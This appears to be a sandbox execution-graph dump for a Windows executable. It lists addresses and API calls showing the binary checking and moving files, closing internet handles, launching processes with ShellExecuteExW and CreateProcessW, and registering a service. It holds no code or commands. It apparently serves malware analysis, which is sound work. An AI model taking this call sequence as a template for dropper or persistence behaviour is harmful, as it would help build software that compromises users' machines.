                                                                                                      execution_graph 24066 7ff71dd97b00 24 API calls 2 library calls 24094 7ff71dd96600 39 API calls _RTC_Initialize 24127 7ff71dd8e500 38 API calls 24174 7ff71dd81000 25 API calls shared_ptr 24175 7ff71dd82400 7 API calls 24129 7ff71dd8f110 RtlEnterCriticalSection 24176 7ff71dd96010 43 API calls 24177 7ff71ddb5410 24 API calls 2 library calls 24068 7ff71dd8e6e0 42 API calls 23169 7ff71ddab0e0 23170 7ff71ddab0f0 23169->23170 23177 7ff71ddb4eb4 23170->23177 23172 7ff71ddab0f9 23174 7ff71ddab107 23172->23174 23185 7ff71ddaaee4 GetStartupInfoW 23172->23185 23178 7ff71ddb4ed3 23177->23178 23179 7ff71ddb4efc 23177->23179 23196 7ff71dda4bc4 23178->23196 23183 7ff71ddb4ee4 23179->23183 23200 7ff71ddb4dbc 6 API calls 2 library calls 23179->23200 23183->23172 23186 7ff71ddaafb3 23185->23186 23187 7ff71ddaaf19 23185->23187 23191 7ff71ddaafd4 23186->23191 23187->23186 23188 7ff71ddb4eb4 24 API calls 23187->23188 23189 7ff71ddaaf42 23188->23189 23189->23186 23190 7ff71ddaaf6c GetFileType 23189->23190 23190->23189 23195 7ff71ddaaff2 23191->23195 23192 7ff71ddab04d GetStdHandle 23194 7ff71ddab060 GetFileType 23192->23194 23192->23195 23193 7ff71ddab0c1 23193->23174 23194->23195 23195->23192 23195->23193 23201 7ff71ddaacf8 23196->23201 23198 7ff71dda4bcd 23199 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23198->23199 23199->23183 23200->23179 23202 7ff71ddaad0d __vcrt_getptd_noinit 23201->23202 23203 7ff71ddaad39 FlsSetValue 23202->23203 23205 7ff71ddaad29 __vcrt_getptd_noinit 23202->23205 23204 7ff71ddaad4b 23203->23204 23203->23205 23217 7ff71ddab160 23204->23217 23205->23198 23208 7ff71ddaad78 FlsSetValue 23211 7ff71ddaad96 23208->23211 23212 7ff71ddaad84 FlsSetValue 23208->23212 23209 7ff71ddaad68 FlsSetValue 23210 7ff71ddaad71 23209->23210 23221 7ff71ddab1d8 23210->23221 23226 7ff71ddaa928 5 API calls _Getctype 23211->23226 23212->23210 23215 7ff71ddaad9e 23216 7ff71ddab1d8 __free_lconv_mon HeapFree 23215->23216 23216->23205 23218 7ff71ddab171 std::_Facet_Register _Getctype 23217->23218 23219 7ff71dda4bc4 _set_fmode 5 API calls 23218->23219 23220 7ff71ddaad5a 23218->23220 23219->23220 23220->23208 23220->23209 23222 7ff71ddab1dd HeapFree 23221->23222 23225 7ff71ddab20c 23221->23225 23223 7ff71ddab1f8 __free_lconv_mon __vcrt_getptd_noinit 23222->23223 23222->23225 23224 7ff71dda4bc4 _set_fmode 4 API calls 23223->23224 23224->23225 23225->23205 23226->23215 24070 7ff71dd81ee0 26 API calls 24134 7ff71dd810e0 30 API calls shared_ptr 24098 7ff71dd985f0 25 API calls __GSHandlerCheck_EH 24099 7ff71dd9b5f0 29 API calls 7 library calls 24179 7ff71dda4bf0 RtlDeleteCriticalSection GetProcAddress __vcrt_uninitialize_locks 24135 7ff71dd8f0f0 RtlLeaveCriticalSection 24138 7ff71dd824f0 9 API calls 2 library calls 24071 7ff71dda7ac0 GetCommandLineA GetCommandLineW 24074 7ff71dd8fed0 43 API calls 24075 7ff71dd886d0 72 API calls 2 library calls 24076 7ff71dd9dec8 8 API calls 2 library calls 24141 7ff71dd998c8 RtlDeleteCriticalSection GetProcAddress TlsSetValue __vcrt_initialize_locks __vcrt_uninitialize_locks 24077 7ff71ddbeecc 40 API calls 24078 7ff71dd962a0 25 API calls 24105 7ff71dd885a0 SetServiceStatus SetEvent 22924 7ff71dd8e4b0 22925 7ff71dd8e4f6 22924->22925 22926 7ff71dd8e4c3 _RTC_Initialize 22924->22926 22926->22925 22929 7ff71dd9dca4 22926->22929 22930 7ff71dd9dcb2 22929->22930 22931 7ff71dd9dcb9 22929->22931 22942 7ff71dd9dadc 39 API calls 22930->22942 22933 7ff71dd8e4e6 22931->22933 22935 7ff71dd9da9c 22931->22935 22943 7ff71dd9d904 RtlEnterCriticalSection 22935->22943 22937 7ff71dd9dab9 22938 7ff71dd9dbc8 39 API calls 22937->22938 22939 7ff71dd9dac5 22938->22939 22940 7ff71dd9d910 _fread_nolock RtlLeaveCriticalSection 22939->22940 22941 7ff71dd9dacf 22940->22941 22941->22933 22942->22933 24080 7ff71ddb32b4 29 API calls 5 library calls 24148 7ff71dd810b0 67 API calls shared_ptr 24084 7ff71dda5a90 27 API calls 5 library calls 24112 7ff71ddbd990 26 API calls 3 library calls 22944 7ff71dd92292 22945 7ff71dd922ae 22944->22945 22946 7ff71dd92316 22945->22946 22947 7ff71dd922d1 22945->22947 22960 7ff71dd82660 22946->22960 22948 7ff71dd922e2 _RTC_Initialize 22947->22948 23033 7ff71dd91d70 47 API calls 2 library calls 22947->23033 22953 7ff71dd92369 22973 7ff71dd91ef0 22953->22973 22955 7ff71dd9238a 23009 7ff71dd943e0 22955->23009 22957 7ff71dd92395 23021 7ff71dd91c30 22957->23021 22959 7ff71dd9239d 22961 7ff71dd826a0 22960->22961 22961->22961 23034 7ff71dd929a0 22961->23034 22963 7ff71dd826b4 23062 7ff71dd81670 22963->23062 22965 7ff71dd826cd 22967 7ff71dd8272c 22965->22967 23083 7ff71dd976f0 22965->23083 22968 7ff71dd82721 22969 7ff71dd995e4 22968->22969 22972 7ff71dd99603 _RTC_Initialize 22969->22972 22970 7ff71dd9962c RtlPcToFileHeader 22971 7ff71dd99644 Concurrency::cancel_current_task 22970->22971 22971->22953 22972->22970 22972->22971 22974 7ff71dd91f21 _RTC_Initialize 22973->22974 23111 7ff71dd94c5c 22974->23111 22976 7ff71dd91f2e 22977 7ff71dd94c5c std::_Lockit::_Lockit 2 API calls 22976->22977 22981 7ff71dd91f7d 22976->22981 22978 7ff71dd91f53 22977->22978 23154 7ff71dd94cd4 22978->23154 22979 7ff71dd94cd4 std::_Lockit::~_Lockit RtlLeaveCriticalSection 22989 7ff71dd92018 _RTC_Initialize 22979->22989 22982 7ff71dd91fc7 _RTC_Initialize 22981->22982 23115 7ff71dd81d40 22981->23115 22982->22979 22985 7ff71dd9206f 23143 7ff71dd81b10 22985->23143 22986 7ff71dd91fe5 23158 7ff71dd9509c 24 API calls std::_Facet_Register 22986->23158 22989->22955 22992 7ff71dd92090 _RTC_Initialize 22993 7ff71dd91c30 47 API calls 22992->22993 22997 7ff71dd92125 _RTC_Initialize 22992->22997 22993->22997 22994 7ff71dd92316 22999 7ff71dd82660 47 API calls 22994->22999 22995 7ff71dd922e2 _RTC_Initialize 22995->22955 22996 7ff71dd922d1 22996->22995 22998 7ff71dd91d70 47 API calls 22996->22998 22997->22994 22997->22996 22998->22995 23000 7ff71dd92358 22999->23000 23001 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23000->23001 23002 7ff71dd92369 23001->23002 23003 7ff71dd91ef0 47 API calls 23002->23003 23004 7ff71dd9238a 23003->23004 23005 7ff71dd943e0 47 API calls 23004->23005 23006 7ff71dd92395 23005->23006 23007 7ff71dd91c30 47 API calls 23006->23007 23008 7ff71dd9239d 23007->23008 23008->22955 23010 7ff71dd94411 _RTC_Initialize 23009->23010 23011 7ff71dd91c30 47 API calls 23010->23011 23012 7ff71dd9442d _RTC_Initialize 23010->23012 23011->23012 23013 7ff71dd94542 23012->23013 23014 7ff71dd94506 23012->23014 23017 7ff71dd82660 47 API calls 23013->23017 23015 7ff71dd94517 _RTC_Initialize 23014->23015 23163 7ff71dd91d70 47 API calls 2 library calls 23014->23163 23015->22957 23018 7ff71dd94584 23017->23018 23019 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23018->23019 23020 7ff71dd94595 23019->23020 23022 7ff71dd91c54 23021->23022 23023 7ff71dd91ce9 _RTC_Initialize 23021->23023 23164 7ff71dd90f70 23022->23164 23023->22959 23025 7ff71dd91c61 _RTC_Initialize 23026 7ff71dd91cd6 23025->23026 23028 7ff71dd91d19 23025->23028 23026->23023 23168 7ff71dd91d70 47 API calls 2 library calls 23026->23168 23029 7ff71dd82660 47 API calls 23028->23029 23030 7ff71dd91d5b 23029->23030 23031 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23030->23031 23032 7ff71dd91d6c 23031->23032 23033->22948 23036 7ff71dd929d1 23034->23036 23045 7ff71dd92aa7 23034->23045 23037 7ff71dd92a03 23036->23037 23038 7ff71dd92a5c 23036->23038 23039 7ff71dd929d7 ctype 23036->23039 23044 7ff71dd92a19 23037->23044 23090 7ff71dd979bc 23037->23090 23041 7ff71dd979bc std::_Facet_Register 24 API calls 23038->23041 23039->22963 23041->23039 23044->23039 23097 7ff71dd81440 24 API calls 2 library calls 23044->23097 23098 7ff71dd814e0 24 API calls 23045->23098 23065 7ff71dd816bb 23062->23065 23063 7ff71dd81913 23108 7ff71dd814e0 24 API calls 23063->23108 23065->23063 23066 7ff71dd81700 23065->23066 23068 7ff71dd81765 23065->23068 23072 7ff71dd816db ctype 23065->23072 23070 7ff71dd979bc std::_Facet_Register 24 API calls 23066->23070 23075 7ff71dd81908 23066->23075 23067 7ff71dd817b4 _RTC_Initialize 23102 7ff71dd91370 24 API calls ctype 23067->23102 23071 7ff71dd979bc std::_Facet_Register 24 API calls 23068->23071 23070->23072 23071->23072 23072->23067 23072->23075 23101 7ff71dd91370 24 API calls ctype 23072->23101 23107 7ff71dd81440 24 API calls 2 library calls 23075->23107 23076 7ff71dd817f8 23077 7ff71dd81919 __std_exception_destroy 23076->23077 23103 7ff71dd9939c 23076->23103 23077->22965 23079 7ff71dd81894 23079->23075 23080 7ff71dd818d0 23079->23080 23081 7ff71dd976f0 codecvt 4 API calls 23080->23081 23082 7ff71dd818f6 23081->23082 23082->22965 23084 7ff71dd976f9 23083->23084 23085 7ff71dd97750 IsProcessorFeaturePresent 23084->23085 23086 7ff71dd97704 23084->23086 23087 7ff71dd97768 23085->23087 23086->22968 23110 7ff71dd97948 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 23087->23110 23089 7ff71dd9777b 23089->22968 23093 7ff71dd979c7 std::_Facet_Register 23090->23093 23091 7ff71dd979e0 23091->23044 23092 7ff71dd979f1 23100 7ff71dd81440 24 API calls 2 library calls 23092->23100 23093->23091 23093->23092 23099 7ff71dd94eb4 RtlPcToFileHeader Concurrency::cancel_current_task std::bad_alloc::bad_alloc 23093->23099 23096 7ff71dd979f7 23096->23044 23097->23045 23100->23096 23101->23067 23102->23076 23104 7ff71dd993f2 ctype 23103->23104 23105 7ff71dd993bd 23103->23105 23104->23079 23105->23104 23109 7ff71dda9a04 23 API calls 2 library calls 23105->23109 23107->23063 23109->23104 23110->23089 23112 7ff71dd94c70 23111->23112 23113 7ff71dd94c6b 23111->23113 23112->22976 23159 7ff71dda4cb4 RtlEnterCriticalSection GetProcAddress std::_Locinfo::_Locinfo_ctor 23113->23159 23116 7ff71dd81d6c 23115->23116 23142 7ff71dd81ea0 23115->23142 23117 7ff71dd979bc std::_Facet_Register 24 API calls 23116->23117 23116->23142 23118 7ff71dd81d7f 23117->23118 23119 7ff71dd94c5c std::_Lockit::_Lockit 2 API calls 23118->23119 23120 7ff71dd81db0 23119->23120 23121 7ff71dd81ebe 23120->23121 23122 7ff71dd81dec 23120->23122 23161 7ff71dd94f1c 24 API calls Concurrency::cancel_current_task 23121->23161 23160 7ff71dd9524c 40 API calls 2 library calls 23122->23160 23142->22985 23142->22986 23144 7ff71dd81b1e Concurrency::cancel_current_task 23143->23144 23145 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23144->23145 23146 7ff71dd81b2f 23145->23146 23147 7ff71dd9939c __std_exception_copy 23 API calls 23146->23147 23148 7ff71dd81b59 23147->23148 23149 7ff71dd94ef8 23148->23149 23162 7ff71dd94e24 23 API calls __std_exception_copy 23149->23162 23151 7ff71dd94f09 23152 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23151->23152 23153 7ff71dd94f1a 23152->23153 23155 7ff71dd94cdf RtlLeaveCriticalSection 23154->23155 23156 7ff71dd94ce8 23154->23156 23156->22981 23158->22982 23162->23151 23163->23015 23166 7ff71dd90f99 _RTC_Initialize 23164->23166 23165 7ff71dd90fb5 23165->23025 23166->23165 23167 7ff71dd91c30 47 API calls 23166->23167 23167->23165 23168->23023 24156 7ff71dd9d860 42 API calls __free_lconv_mon 24085 7ff71dd96660 31 API calls 2 library calls 24114 7ff71ddbf960 RtlDecodePointer _RTC_Initialize 24159 7ff71ddaf064 41 API calls 6 library calls 24160 7ff71ddbd85c RtlUnwindEx __GSHandlerCheck_SEH __GSHandlerCheckCommon 23897 7ff71ddae95c 23898 7ff71ddae9bf 23897->23898 23899 7ff71ddae98e 23897->23899 23898->23899 23905 7ff71ddae9d6 23898->23905 23900 7ff71dda4bc4 _set_fmode 5 API calls 23899->23900 23901 7ff71ddae993 23900->23901 23985 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23901->23985 23903 7ff71ddae99e 23904 7ff71ddaea8e 23906 7ff71ddaeae9 23904->23906 23907 7ff71ddaeabe 23904->23907 23905->23904 23911 7ff71ddab160 _Getctype 5 API calls 23905->23911 23910 7ff71ddab160 _Getctype 5 API calls 23906->23910 23908 7ff71ddaf474 26 API calls 23907->23908 23909 7ff71ddaeac8 23908->23909 23920 7ff71ddaeae1 23909->23920 23936 7ff71ddaebac 23909->23936 23912 7ff71ddaeb03 23910->23912 23913 7ff71ddaea3c 23911->23913 23932 7ff71ddaeb0b 23912->23932 23988 7ff71dda9a04 23 API calls 2 library calls 23912->23988 23915 7ff71ddaea53 23913->23915 23916 7ff71ddaea44 23913->23916 23986 7ff71dda9a04 23 API calls 2 library calls 23915->23986 23918 7ff71ddab1d8 __free_lconv_mon 5 API calls 23916->23918 23918->23903 23921 7ff71ddaeb1e 23921->23920 23924 7ff71dda4bc4 _set_fmode 5 API calls 23921->23924 23922 7ff71ddab1d8 __free_lconv_mon 5 API calls 23922->23920 23923 7ff71ddaea65 23923->23920 23987 7ff71ddb98d4 23 API calls 2 library calls 23923->23987 23930 7ff71ddaeb27 23924->23930 23926 7ff71ddaea7b 23926->23920 23927 7ff71ddab1d8 __free_lconv_mon 5 API calls 23926->23927 23927->23904 23929 7ff71ddaf474 26 API calls 23929->23930 23930->23920 23930->23929 23931 7ff71ddaeb66 23930->23931 23930->23932 23989 7ff71dda9a04 23 API calls 2 library calls 23930->23989 23933 7ff71dda4bc4 _set_fmode 5 API calls 23931->23933 23932->23922 23934 7ff71ddaeb6b 23933->23934 23935 7ff71ddaebac 51 API calls 23934->23935 23935->23932 23937 7ff71ddaebdf 23936->23937 23938 7ff71ddaebf8 23936->23938 23939 7ff71dda4bc4 _set_fmode 5 API calls 23937->23939 23938->23937 23941 7ff71ddaec03 23938->23941 23942 7ff71ddaec0d 23938->23942 23940 7ff71ddaebe4 23939->23940 24043 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23940->24043 23944 7ff71dda4ba4 _fread_nolock 5 API calls 23941->23944 23990 7ff71ddb9c38 23942->23990 23944->23937 23947 7ff71ddaec30 23948 7ff71ddab1d8 __free_lconv_mon 5 API calls 23947->23948 23950 7ff71ddaec39 23948->23950 23952 7ff71ddab1d8 __free_lconv_mon 5 API calls 23950->23952 23984 7ff71ddaebef 23952->23984 23953 7ff71ddab1d8 __free_lconv_mon 5 API calls 23953->23947 23954 7ff71dda4ba4 _fread_nolock 5 API calls 23955 7ff71ddaec7f _fread_nolock 23954->23955 24016 7ff71ddb9d9c 23955->24016 23958 7ff71ddaedff BuildCatchObjectHelperInternal 23959 7ff71ddaed52 __vcrt_getptd_noinit 24044 7ff71dda4b38 5 API calls 2 library calls 23959->24044 23960 7ff71ddaed84 23962 7ff71ddaed8a 23960->23962 23963 7ff71ddaedae 23960->23963 23961 7ff71ddaed0c WaitForSingleObject GetExitCodeProcess 23961->23959 23964 7ff71ddaed2a 23961->23964 23966 7ff71ddaed8f CloseHandle 23962->23966 23967 7ff71ddaed98 23962->23967 23970 7ff71ddaedb3 CloseHandle 23963->23970 23971 7ff71ddaedbc 23963->23971 23968 7ff71ddaed33 CloseHandle 23964->23968 23969 7ff71ddaed3c 23964->23969 23966->23967 23973 7ff71ddaec6b 23967->23973 23974 7ff71ddaed9d CloseHandle 23967->23974 23968->23969 23969->23973 23975 7ff71ddaed41 CloseHandle 23969->23975 23970->23971 23976 7ff71ddab1d8 __free_lconv_mon 5 API calls 23971->23976 23972 7ff71ddaed5f 23977 7ff71ddaed64 CloseHandle 23972->23977 23978 7ff71ddaed6d 23972->23978 23973->23953 23974->23973 23975->23973 23980 7ff71ddaedc5 23976->23980 23977->23978 23978->23973 23979 7ff71ddaed76 CloseHandle 23978->23979 23979->23973 23981 7ff71ddab1d8 __free_lconv_mon 5 API calls 23980->23981 23982 7ff71ddaedd2 23981->23982 23983 7ff71ddab1d8 __free_lconv_mon 5 API calls 23982->23983 23983->23984 23984->23920 23985->23903 23986->23923 23987->23926 23988->23921 23989->23930 23991 7ff71ddb9c6f 23990->23991 23992 7ff71ddab160 _Getctype 5 API calls 23991->23992 23993 7ff71ddb9ca5 23992->23993 23994 7ff71ddb9cad 23993->23994 24004 7ff71ddb9cc3 23993->24004 24045 7ff71dda4b38 5 API calls 2 library calls 23994->24045 23996 7ff71ddb9cba 23999 7ff71ddab1d8 __free_lconv_mon 5 API calls 23996->23999 23997 7ff71ddb9cb5 24000 7ff71dda4bc4 _set_fmode 5 API calls 23997->24000 24002 7ff71ddb9d24 23999->24002 24000->23996 24001 7ff71ddb9d89 24003 7ff71ddb9d49 24002->24003 24047 7ff71ddb9940 41 API calls 7 library calls 24002->24047 24006 7ff71ddab1d8 __free_lconv_mon 5 API calls 24003->24006 24004->23996 24004->24001 24046 7ff71dda9a04 23 API calls 2 library calls 24004->24046 24008 7ff71ddaec28 24006->24008 24007 7ff71ddb9d3b 24009 7ff71ddb9d3f 24007->24009 24010 7ff71ddb9d4b 24007->24010 24008->23947 24013 7ff71ddaf004 24008->24013 24011 7ff71ddab1d8 __free_lconv_mon 5 API calls 24009->24011 24012 7ff71ddab1d8 __free_lconv_mon 5 API calls 24010->24012 24011->24003 24012->24003 24048 7ff71ddae91c 24013->24048 24015 7ff71ddaec67 24015->23954 24015->23973 24017 7ff71dda6178 TranslateName 23 API calls 24016->24017 24018 7ff71ddb9e26 24017->24018 24020 7ff71ddb9e35 24018->24020 24063 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 24018->24063 24021 7ff71dda6af4 6 API calls 24020->24021 24022 7ff71ddb9e98 24021->24022 24023 7ff71ddba001 24022->24023 24024 7ff71dda6178 TranslateName 23 API calls 24022->24024 24026 7ff71ddba012 24023->24026 24027 7ff71ddab1d8 __free_lconv_mon 5 API calls 24023->24027 24025 7ff71ddb9eac 24024->24025 24033 7ff71ddb9eb6 24025->24033 24064 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 24025->24064 24028 7ff71ddba021 24026->24028 24029 7ff71ddab1d8 __free_lconv_mon 5 API calls 24026->24029 24027->24026 24030 7ff71ddaecf1 24028->24030 24032 7ff71ddab1d8 __free_lconv_mon 5 API calls 24028->24032 24029->24028 24030->23958 24030->23959 24030->23960 24030->23961 24032->24030 24034 7ff71dda6af4 6 API calls 24033->24034 24035 7ff71ddb9f19 24034->24035 24035->24023 24036 7ff71ddb9fb5 CreateProcessW 24035->24036 24037 7ff71dda6178 TranslateName 23 API calls 24035->24037 24036->24023 24038 7ff71ddb9f3d 24037->24038 24041 7ff71ddb9f47 24038->24041 24065 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 24038->24065 24040 7ff71dda6af4 6 API calls 24042 7ff71ddb9faa 24040->24042 24041->24040 24042->24023 24042->24036 24043->23984 24044->23972 24045->23997 24046->24004 24047->24007 24049 7ff71ddae938 24048->24049 24052 7ff71ddaee08 24049->24052 24051 7ff71ddae941 24051->24015 24053 7ff71ddaee4f 24052->24053 24054 7ff71ddaee81 24053->24054 24055 7ff71ddaee93 24053->24055 24056 7ff71dda4bc4 _set_fmode 5 API calls 24054->24056 24057 7ff71ddab160 _Getctype 5 API calls 24055->24057 24058 7ff71ddaee86 24056->24058 24059 7ff71ddaeeb4 24057->24059 24058->24051 24060 7ff71dda4bc4 _set_fmode 5 API calls 24059->24060 24062 7ff71ddaeec1 _fread_nolock 24059->24062 24060->24062 24061 7ff71ddab1d8 __free_lconv_mon 5 API calls 24061->24058 24062->24061 24063->24020 24064->24033 24065->24041 24086 7ff71dda7e70 FlsSetValue FlsSetValue FlsSetValue FlsSetValue HeapFree 24195 7ff71dd97f70 28 API calls 2 library calls 23227 7ff71dd9d275 23239 7ff71dda99d8 23227->23239 23229 7ff71dd9d27a 23230 7ff71dd9d2a1 GetModuleHandleW 23229->23230 23231 7ff71dd9d2eb 23229->23231 23230->23231 23237 7ff71dd9d2ae 23230->23237 23232 7ff71dd9d178 FlsSetValue FlsSetValue FlsSetValue FlsSetValue HeapFree 23231->23232 23233 7ff71dd9d327 23232->23233 23234 7ff71dd9d32e 23233->23234 23235 7ff71dd9d344 6 API calls 23233->23235 23236 7ff71dd9d340 23235->23236 23237->23231 23238 7ff71dd9d39c GetModuleHandleExW GetProcAddress 23237->23238 23238->23231 23244 7ff71ddaab80 23 API calls 4 library calls 23239->23244 23243 7ff71dda99e1 __crtLCMapStringW 23245 7ff71dda675c 23 API calls BuildCatchObjectHelperInternal 23243->23245 23244->23243 24162 7ff71ddae468 28 API calls 3 library calls 24163 7ff71dd95040 RtlLeaveCriticalSection RtlEnterCriticalSection GetProcAddress ctype 24196 7ff71dd8ef40 42 API calls 2 library calls 24118 7ff71ddb6940 25 API calls 4 library calls 23246 7ff71dd9e337 41 API calls _fread_nolock 24198 7ff71dd81340 23 API calls __std_exception_copy 24087 7ff71ddbba50 36 API calls 24165 7ff71ddb7c50 GetProcessHeap 24166 7ff71dd97c4a 5 API calls BuildCatchObjectHelperInternal 24199 7ff71ddbeb4c RtlPcToFileHeader Concurrency::cancel_current_task 24200 7ff71dd9d720 6 API calls 2 library calls 24088 7ff71dd8e620 41 API calls 24121 7ff71dd8e920 32 API calls 4 library calls 24169 7ff71ddbc020 CloseHandle 24122 7ff71ddab120 6 API calls 24123 7ff71ddb4518 47 API calls 6 library calls 23247 7ff71dd97b1c 23271 7ff71dd97cf0 23247->23271 23250 7ff71dd97c73 23396 7ff71dd98430 4 API calls 2 library calls 23250->23396 23251 7ff71dd97b3d __scrt_acquire_startup_lock 23253 7ff71dd97c7d 23251->23253 23261 7ff71dd97b5b _RTC_Initialize __scrt_release_startup_lock 23251->23261 23397 7ff71dd98430 4 API calls 2 library calls 23253->23397 23255 7ff71dd97b80 23256 7ff71dd97c88 BuildCatchObjectHelperInternal 23398 7ff71dd98324 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 23256->23398 23258 7ff71dd97ca9 23259 7ff71dd97c06 23277 7ff71dda787c 23259->23277 23261->23255 23261->23259 23393 7ff71dd9d440 23 API calls __GSHandlerCheck_EH 23261->23393 23263 7ff71dd97c0b 23283 7ff71dd82840 23263->23283 23267 7ff71dd97c2f 23267->23256 23268 7ff71dd97c33 23267->23268 23395 7ff71dd97e74 RtlDeleteCriticalSection 23268->23395 23270 7ff71dd97c46 23270->23255 23272 7ff71dd97cf8 23271->23272 23273 7ff71dd97d04 __scrt_dllmain_crt_thread_attach 23272->23273 23274 7ff71dd97b35 23273->23274 23275 7ff71dd97d11 23273->23275 23274->23250 23274->23251 23275->23274 23399 7ff71dd998f0 RtlDeleteCriticalSection __vcrt_uninitialize_ptd __vcrt_uninitialize_locks 23275->23399 23278 7ff71dda78a1 23277->23278 23279 7ff71dda788c 23277->23279 23278->23263 23279->23278 23400 7ff71dda730c 25 API calls __free_lconv_mon 23279->23400 23281 7ff71dda78aa 23281->23278 23401 7ff71dda76cc 6 API calls 3 library calls 23281->23401 23284 7ff71dd828c8 23283->23284 23402 7ff71dd8fe90 23284->23402 23286 7ff71dd828d7 23406 7ff71dda3510 23286->23406 23288 7ff71dd828ec 23289 7ff71dd8fe90 47 API calls 23288->23289 23290 7ff71dd8293a 23289->23290 23436 7ff71dd8fcd0 23290->23436 23292 7ff71dd82d5d 23293 7ff71dd82d6a GetFileAttributesW 23292->23293 23295 7ff71dd82d7d 23293->23295 23294 7ff71dd82ee5 23297 7ff71dd8fcd0 24 API calls 23294->23297 23295->23294 23448 7ff71dd8f530 23295->23448 23298 7ff71dd82f7d 23297->23298 23302 7ff71dd8fcd0 24 API calls 23298->23302 23299 7ff71dd82ec0 23494 7ff71dd8f410 23299->23494 23304 7ff71dd8303a 23302->23304 23305 7ff71dd8fcd0 24 API calls 23304->23305 23306 7ff71dd83737 23305->23306 23307 7ff71dd8fcd0 24 API calls 23306->23307 23308 7ff71dd83b2e 23307->23308 23309 7ff71dd8fcd0 24 API calls 23308->23309 23310 7ff71dd83fb3 23309->23310 23313 7ff71dd8fcd0 24 API calls 23310->23313 23311 7ff71dd82db1 23311->23299 23476 7ff71dd920a0 23311->23476 23315 7ff71dd844de 23313->23315 23314 7ff71dd82eb1 23316 7ff71dd920a0 47 API calls 23314->23316 23317 7ff71dd8fcd0 24 API calls 23315->23317 23316->23299 23318 7ff71dd84acf 23317->23318 23319 7ff71dd84adc GetFileAttributesW 23318->23319 23320 7ff71dd84aea 23319->23320 23321 7ff71dd84af2 23319->23321 23320->23321 23322 7ff71dd8508e 23320->23322 23324 7ff71dd8fcd0 24 API calls 23321->23324 23323 7ff71dd8509a GetFileAttributesW 23322->23323 23325 7ff71dd850d3 23323->23325 23329 7ff71dd850a8 23323->23329 23327 7ff71dd8504d 23324->23327 23326 7ff71dd850df GetFileAttributesW 23325->23326 23328 7ff71dd8512d 23326->23328 23345 7ff71dd85135 23326->23345 23547 7ff71dd8cdf0 15 API calls 2 library calls 23327->23547 23330 7ff71dd85712 23328->23330 23328->23345 23329->23325 23331 7ff71dd850c7 MoveFileW 23329->23331 23335 7ff71dd85721 GetFileAttributesW 23330->23335 23331->23325 23333 7ff71dd85074 InternetCloseHandle 23548 7ff71dd8fc60 23333->23548 23336 7ff71dd8572f 23335->23336 23347 7ff71dd85737 23335->23347 23337 7ff71dd86d92 23336->23337 23336->23347 23338 7ff71dd8fcd0 24 API calls 23337->23338 23339 7ff71dd86e69 23338->23339 23340 7ff71dd86e76 lstrcmpiW 23339->23340 23341 7ff71dd86e87 23340->23341 23342 7ff71dd86e91 GetCurrentProcessId 23340->23342 23502 7ff71dd87a20 GetModuleFileNameW 23341->23502 23556 7ff71dd81500 24 API calls codecvt 23342->23556 23346 7ff71dd8fcd0 24 API calls 23345->23346 23348 7ff71dd856d2 23346->23348 23375 7ff71dd8fcd0 24 API calls 23347->23375 23549 7ff71dd8cdf0 15 API calls 2 library calls 23348->23549 23350 7ff71dd856f9 23550 7ff71dd8cf30 InternetCloseHandle 23350->23550 23352 7ff71dd856fe 23352->23330 23353 7ff71dd86e8c 23354 7ff71dd976f0 codecvt 4 API calls 23353->23354 23355 7ff71dd87954 23354->23355 23394 7ff71dd98580 GetModuleHandleW 23355->23394 23356 7ff71dd86ea5 23357 7ff71dd8fcd0 24 API calls 23356->23357 23358 7ff71dd87047 23357->23358 23557 7ff71dd8fbd0 24 API calls ctype 23358->23557 23360 7ff71dd8705b 23361 7ff71dd870b2 ShellExecuteExW 23360->23361 23362 7ff71dd8730a StartServiceCtrlDispatcherW 23361->23362 23364 7ff71dd870d0 __vcrt_getptd_noinit 23361->23364 23363 7ff71dd8788d 23362->23363 23371 7ff71dd8733a 23362->23371 23363->23353 23558 7ff71dd923b0 47 API calls 2 library calls 23364->23558 23366 7ff71dd872e6 23559 7ff71dd8dbc0 47 API calls 5 library calls 23366->23559 23368 7ff71dd872f0 23560 7ff71dd923b0 47 API calls 2 library calls 23368->23560 23370 7ff71dd872fb 23370->23362 23372 7ff71dd8fcd0 24 API calls 23371->23372 23373 7ff71dd87878 23372->23373 23561 7ff71dd885f0 27 API calls 2 library calls 23373->23561 23376 7ff71dd868be 23375->23376 23551 7ff71dd8cdf0 15 API calls 2 library calls 23376->23551 23378 7ff71dd868e5 23552 7ff71dd8cf30 InternetCloseHandle 23378->23552 23380 7ff71dd868ea 23381 7ff71dd8fcd0 24 API calls 23380->23381 23382 7ff71dd86aab 23381->23382 23383 7ff71dd86b11 ShellExecuteExW 23382->23383 23384 7ff71dd86d5f WaitForSingleObject CloseHandle 23383->23384 23386 7ff71dd86b32 __vcrt_getptd_noinit 23383->23386 23385 7ff71dd86d85 23384->23385 23385->23337 23553 7ff71dd923b0 47 API calls 2 library calls 23386->23553 23388 7ff71dd86d3b 23554 7ff71dd8dbc0 47 API calls 5 library calls 23388->23554 23390 7ff71dd86d45 23555 7ff71dd923b0 47 API calls 2 library calls 23390->23555 23392 7ff71dd86d50 23392->23384 23393->23259 23394->23267 23395->23270 23396->23253 23397->23256 23398->23258 23399->23274 23400->23281 23401->23278 23403 7ff71dd8feb0 23402->23403 23403->23403 23404 7ff71dd929a0 47 API calls 23403->23404 23405 7ff71dd8febe 23404->23405 23405->23286 23562 7ff71ddae8fc 23406->23562 23409 7ff71dda3642 23410 7ff71dda3583 23415 7ff71dda4bc4 _set_fmode 5 API calls 23410->23415 23433 7ff71dda35d0 23410->23433 23411 7ff71dda3559 23412 7ff71dda3566 23411->23412 23411->23433 23565 7ff71ddaf474 23412->23565 23414 7ff71ddab1d8 __free_lconv_mon 5 API calls 23417 7ff71dda3578 23414->23417 23418 7ff71dda35a8 23415->23418 23420 7ff71dd976f0 codecvt 4 API calls 23417->23420 23421 7ff71dda4bc4 